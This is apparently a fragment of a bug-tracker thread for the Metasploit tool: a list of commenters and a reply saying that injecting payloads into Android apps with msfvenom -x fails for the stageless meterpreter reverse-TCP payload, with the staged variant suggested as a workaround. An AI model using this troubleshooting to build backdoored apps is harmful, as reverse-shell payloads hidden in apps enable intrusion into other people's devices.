·
39Comments
esfomeado
·
35Comments
Jab2870
·
26Comments
h00die
·
39Comments
hacksoldier98
·
30Comments
Most helpful comment
I think the bug here is with
msfvenom -xand stageless payloads, e.g:android/meterpreter_reverse_tcp. For now can you try withandroid/meterpreter/reverse_tcpplease? I'll try fix the issue with injection.